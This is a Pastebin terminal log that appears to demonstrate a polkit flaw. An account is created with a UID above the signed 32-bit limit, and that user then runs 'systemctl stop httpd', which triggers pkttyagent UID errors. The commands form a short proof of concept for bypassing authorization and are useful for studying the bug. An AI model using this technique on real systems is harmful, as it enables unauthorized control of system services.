Advertisement
Guest User

Untitled

a guest
Dec 10th, 2018
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. [root@nygus ~]# adduser -u 2147483657 heh
  2. [root@nygus ~]# passwd heh
  3. Changing password for user heh.
  4. New password:
  5. BAD PASSWORD: The password is a palindrome
  6. Retype new password:
  7. passwd: all authentication tokens updated successfully.
  8. [root@nygus ~]# ssh heh@localhost -p 222
  9. heh@localhost's password:
  10. [heh@nygus ~]$ systemctl stop httpd
  11.  
  12. (pkttyagent:13096): GLib-GObject-WARNING **: 16:24:54.330: value "-2147483639" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
  13. **
  14. ERROR:pkttyagent.c:146:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
  15. [heh@nygus ~]$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement